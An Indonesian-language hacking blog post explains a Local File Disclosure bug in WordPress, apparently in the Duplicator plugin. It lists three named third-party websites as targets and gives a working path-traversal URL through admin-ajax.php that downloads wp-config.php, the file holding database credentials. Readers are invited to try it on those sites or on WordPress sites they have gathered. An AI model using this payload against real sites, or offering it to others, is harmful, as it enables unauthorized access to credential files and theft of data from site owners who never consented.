Halo teman teman, sudah lama nih kita tidak bahas bug ya kan, nah di artikel kali ini mimin bakal membahas yaitu, Wordpress Vulnerability Local File Disclosure, bug ini mimin di kasih tau oleh Ahmad Faisal (Pendiri FOURSDEATH TEAM).
Apa sih Local File Disclosure itu?
Local File Disclosure sendiri sebenarnya konsepnya hampir mirip dengan Local File Inclusion (LFI), tapi yang dapat di bedakan adalah kalau Local File Disclosure(LFD) ini file tidak dapat ditampilkan pada browser kita melainkan file hanya bisa kita download lalu baru kita bisa membaca atau membuka.
Dampaknya atau Bahayanya Dari Adanya Local File Disclosure Itu Apa Sih?
Local File Disclosure ini termasuk celah atau kerentanan yang memiliki pangkat severity high-critical, jadi untuk bahayanya itu Attacker atau Hacker atau Apalah Itu dapat mengunduh source code atau file-file penting dari website target, sehingga Attacker atau Hacker tersebut dapat melihat file atau data sensitif.
Oke langsung saja kita ke pembahasan.
Sebelum itu anda harus mempunyai target sebuah website yang memakai CMS WORDPRESS
Nah beruntung sekali mimin kali ini sudah punya website yang memakai cms wordpress dan memiliki kerentanan Local File Disclosure yekan.
List Website Punya Mimin
- fanour.com
- taavon.co
- buza-bauleistungen.de
Kalian bisa mencobanya trik ini bisa menggunakan Website CMS WORDPRESS Yang Sudah Kalian Kumpulkan Atau Pakai Punya Mimin.
Nah untuk mengetahui website nya mempunyai kerentanan Local File Disclosure Silahkan Tambahin Exploit Dibelakang URL, Contoh:
http://fanour.com/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php
Nah jika sudah seperti itu kalian tinggal buka aja lewat browser kalian maka file wp-config.php akan terdownload
result:
Nah sudah keliatan kan isi file wp-config.php dari website target tersebut:D
Sekian Terimakasih><